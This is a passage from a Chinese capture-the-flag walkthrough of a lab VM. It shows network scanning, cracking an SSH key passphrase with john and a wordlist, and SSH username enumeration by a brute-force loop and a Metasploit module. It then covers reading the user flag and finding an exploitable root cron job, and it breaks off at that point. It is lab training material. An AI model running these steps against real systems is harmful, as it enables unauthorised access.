❯ sudo arp-scan -l [sudo] password for Pepster: Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.60.1 00:50:56:c0:00:08 VMware, Inc. 192.168.60.2 00:50:56:e3:f6:57 VMware, Inc. 192.168.60.229 08:00:27:31:84:e3 PCS Systemtechnik GmbH 192.168.60.254 00:50:56:e1:d8:58 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.114 seconds (121.10 hosts/sec). 4 responded ❯ export ip=192.168.60.229 ❯ rustscan -a $ip .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- Open ports, closed hearts. [~] The config file is expected to be at "/home/Pepster/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 192.168.60.229:22 Open 192.168.60.229:8000 [~] Starting Script(s) [~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-05 15:12 CST Initiating ARP Ping Scan at 15:12 Scanning 192.168.60.229 [1 port] Completed ARP Ping Scan at 15:12, 0.05s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 15:12 Completed Parallel DNS resolution of 1 host. at 15:12, 0.01s elapsed DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 15:12 Scanning 192.168.60.229 [2 ports] Discovered open port 8000/tcp on 192.168.60.229 Discovered open port 22/tcp on 192.168.60.229 Completed SYN Stealth Scan at 15:12, 0.07s elapsed (2 total ports) Nmap scan report for 192.168.60.229 Host is up, received arp-response (0.00035s latency). Scanned at 2025-03-05 15:12:15 CST for 0s
PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 64 8000/tcp open http-alt syn-ack ttl 64 MAC Address: 08:00:27:31:84:E3 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
Detected Plugins: [ HTTPServer ] HTTP server header string. This plugin also attempts to identify the operating system from the server header.
String : SimpleHTTP/0.6 Python/3.7.3 (from server string)
[ Python ] Python is a programming language that lets you work more quickly and integrate your systems more effectively. You can learn to use Python and see almost immediate gains in productivity and lower maintenance costs.
Version : 3.7.3 Website : http://www.python.org/
HTTP Headers: HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/3.7.3 Date: Wed, 05 Mar 2025 07:13:56 GMT Content-type: text/html Content-Length: 44 Last-Modified: Sat, 03 Jun 2023 18:24:27 GMT
❯ vi id_rsa ❯ ssh2john id_rsa >hash ❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes Cost 2 (iteration count) is 2 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status idontknow (id_rsa) 1g 0:00:00:00 DONE (2025-03-05 15:34) 100.0g/s 131200p/s 131200c/s 131200C/s cuties..slayer Use the "--show" option to display all of the cracked passwords reliably Session completed.
用户名枚举
但问题是我们不知道用户名
所以尝试枚举用户名登录
不过ssh并没有选项给我们在命令行中传递私钥密码
利用ssh-agent代理来预加载私钥
1 2 3 4 5 6 7
❯ eval $(ssh-agent -s) # 启动 ssh-agent Agent pid 1831758 ❯ ssh-add id_rsa # 添加私钥,系统会提示输入密码 Enter passphrase for id_rsa: Identity added: id_rsa (id_rsa) ❯ for i in $(cat /usr/share/seclists/Usernames/Names/names.txt);do ssh $i@$ip ;done ##接下去一路按回车即可
❯ rustscan -a $ip -- -A -sV .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' Open 192.168.60.230:22 Open 192.168.60.230:8000 [~] Starting Script(s) [>] Running script "nmap -vvv -p {{port}} {{ip}} -A -sV" on ip 192.168.60.230 Depending on the complexity of the script, results may take some time to appear. PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 7.7 (protocol 2.0) | ssh-hostkey: | 2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDhemxEZcm98GFwIRozVUePnC+Cejni5lScAa7ha5neDlWQT2e6dbubOkddku/qgtgY4/kw/pGPh7oTqHg9WKHTMqTAzdN0DDaU/5twewwMf6s9ERuuYYieP7mzjsX2APhOr23CFWVr37Y+mQ/A4J0ODizpr/mggCCi6kqHqyRWgcPG98AVJ9IjPehVkptQdLpQlSOV8EzJClu6tBInWzxtGi5v0B94lMYRDXqZE9Z1wCSh9oU0HnwRwfFqB0dcOH+kDZVLYi06aiHKXkKgSFM3G6LJQY8ad4FCEc7TU+agLRPHFUPFqqPbf9hbDD7MUdR4pXEQtJ1p/D/9rdbBg1Sp | 256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB+zmcUltQUYUVvvfWqtUjdFpCh0IkOnPjmcctTpnXS7MWK37n6h9DEq4WNsHmauyKEuRnml5mOLUbNIZHHUBgY= | 256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHNArrcR981CzORruPnEn/opg56t7SFktwnhZzGpXcfE 8000/tcp open http syn-ack ttl 64 SimpleHTTPServer 0.6 (Python 3.7.3) | http-methods: |_ Supported Methods: GET HEAD |_http-server-header: SimpleHTTP/0.6 Python/3.7.3 |_http-title: Site doesn't have a title (text/html). MAC Address: 08:00:27:A6:23:DC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Uptime guess: 3.163 days (since Sun Mar 2 13:49:30 2025) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=260 (Good luck!) IP ID Sequence Generation: All zeros
TRACEROUTE HOP RTT ADDRESS 1 0.58 ms 192.168.60.230
❯ msfconsole Metasploit tip: Use the edit command to open the currently active module in your editor
msf6 > search openssh
Matching Modules ================
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/windows/manage/forward_pageant . normal No Forward SSH Agent Requests To Remote Pageant 1 post/windows/manage/install_ssh . normal No Install OpenSSH for Windows 2 post/multi/gather/ssh_creds . normal No Multi Gather OpenSSH PKI Credentials Collection 3 auxiliary/scanner/ssh/ssh_enumusers . normal No SSH Username Enumeration 4 \_ action: Malformed Packet . . . Use a malformed packet 5 \_ action: Timing Attack . . . Use a timing attack 6 exploit/windows/local/unquoted_service_path 2001-10-25 great Yes Windows Unquoted Service Path Privilege Escalation
Interact with a module by name or index. For example info 6, use 6 or use exploit/windows/local/unquoted_service_path
msf6 > use 3 [*] Using action Malformed Packet - view all 2 actions with the show actions command msf6 auxiliary(scanner/ssh/ssh_enumusers) > show options
Name Current Setting Required Description ---- --------------- -------- ----------- CHECK_FALSE true no Check forfalse positives (random username) DB_ALL_USERS false no Add all usersin the current database to the list Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit. html RPORT 22 yes The target port THREADS 1 yes The number of concurrent threads (max one per host) THRESHOLD 10 yes Amount of seconds needed before a user is considered found (timing attack only) USERNAME no Single username to test (username spray) USER_FILE no File containing usernames, one per line
Auxiliary action:
Name Description ---- ----------- Malformed Packet Use a malformed packet
View the full module info with the info, or info -d command.
[*] 192.168.60.230:22 - SSH - Using malformed packet technique [*] 192.168.60.230:22 - SSH - Checking forfalse positives [*] 192.168.60.230:22 - SSH - Starting scan [+] 192.168.60.230:22 - SSH - User 'abel' found ^C[*] Caught interrupt from the console... [*] Auxiliary module execution completed msf6 auxiliary(scanner/ssh/ssh_enumusers) >
用户提权
得到用户abel,拿到user
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
abel@listen:~$ id uid=1000(abel) gid=1000(abel) groups=1000(abel) abel@listen:~$ ls -al total 32 drwx------ 4 abel abel 4096 Jun 3 2023 . drwxr-xr-x 3 root root 4096 Jun 3 2023 .. lrwxrwxrwx 1 root root 9 Jun 20 2021 .bash_history -> /dev/null -rw-r--r-- 1 abel abel 220 Jun 12 2021 .bash_logout -rw-r--r-- 1 abel abel 3526 Jun 12 2021 .bashrc drwxr-xr-x 3 abel abel 4096 Jun 3 2023 .local -rw-r--r-- 1 abel abel 66 Jun 12 2021 .selected_editor drwx------ 2 abel abel 4096 Jun 3 2023 .ssh -r-------- 1 abel abel 33 Jun 3 2023 user.txt abel@listen:~$ cat user.txt 33f3f86a697126c6fe0a39a337ade21a
传个linpeas.sh上去,扫一遍
Root提权
任意文件读取
发现存在定时任务,root会每分钟复制/var/www/html/index.html到/tmp
而且这个/var/www/html文件夹是隶属于当前用户abel的
1 2 3 4 5 6 7
* * * * * root cp /var/www/html/index.html /tmp ------------------------------------------------------ abel@listen:/var/www/html$ ls -la total 12 drwxr-xr-x 2 abel abel 4096 Jun 3 2023 . drwxr-xr-x 3 abel abel 4096 Jun 3 2023 .. -rw-r--r-- 1 abel abel 44 Jun 3 2023 index.html
